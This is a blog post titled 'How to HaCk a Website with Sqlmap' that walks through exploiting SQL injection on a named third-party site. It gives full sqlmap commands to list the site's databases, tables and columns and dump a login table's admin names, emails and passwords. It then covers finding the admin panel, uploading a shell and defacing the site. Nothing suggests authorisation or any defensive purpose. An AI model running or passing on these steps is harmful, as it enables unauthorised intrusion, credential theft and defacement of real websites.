Menu
» » How to HaCk a Website with Sqlmap By 3Xp!r3 M!ND

Asalam U Alikum Friends  Today going to show U how to get access to a website Website with sqlmap 
U can also use sqlmap in backtrack but if  u are using window then install it
  ..link below  Trick By 3Xp!r3 M!ND



Follow my steps Frist Download sqlmap and python >>>> 

Download the Sqlmap Here  

Download python for windows required !! 


Step 1# Download python and install it

Step 2# Download the Sqlmap and extract it in ..

C:\Users\username


For example C:\Users\Umi



Step 3# Find a Vulnerable Site For Example like this ..

http://www.techs.pk/news_events_detail.php?id=11'

Step 4# Now open run >> type cmd hit enter ...

Step 5# NOw type cd Sqlmap .. like this ..





Step 6# to find the database of a site type >>

Sqlmap.py -u "site?" --dbs

-u is used to denote the url and --dbs is used to find database of sites ..



Step 6# Now if the site is Vulnerable it will Find the database like this ...





Step 7# Now we have to find tables to do that type >>


Sqlmap.py -u "site?" -D database name --tables

For Example


Sqlmap.py -u http://www.techs.pk/news_events_detail.php?id=11 -D phase_iv --tables


This will show u All the tables of the database like this





Step 8# Now to Find columns type this >>>


Sqlmap.py -u "site?" -D database name -T "table_name" --columns 

For example : 


sqlmap.py -u http://www.techs.pk/news_events_detail.php?id=11 -D phase_iv -T login --columns 



Result : 


Step 9# Now we have found the database,tables and columns Now we have to dump columns to get username,pass etc ..
to do that type >>


Sqlmap.py -u "site" -D database name -T "table_name" -C "column_name" --dump 


For Example :

sqlmap.py -u http://www.techs.pk/news_events_detail.php?id=11 -D phase_iv -T login -C admin,email,pass --dump

Result :



step 10# Now we just have to find the adminpanel to do that use my admin finder download here or u can search it in google Online adminfinder  ..



Note : AdminFinder wont work unless u have perl install in ur window U can also use adminfinder in backtrack ...

But If u want to use adminfinder then

Download Perl here

Step 11# login >> now to deface the site Upload ur  shell Deface website Done .. 

Video tutorial can be found here

Note : Some websites  can't be defaced ..
Posted by
Labels:
at 03:56

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Top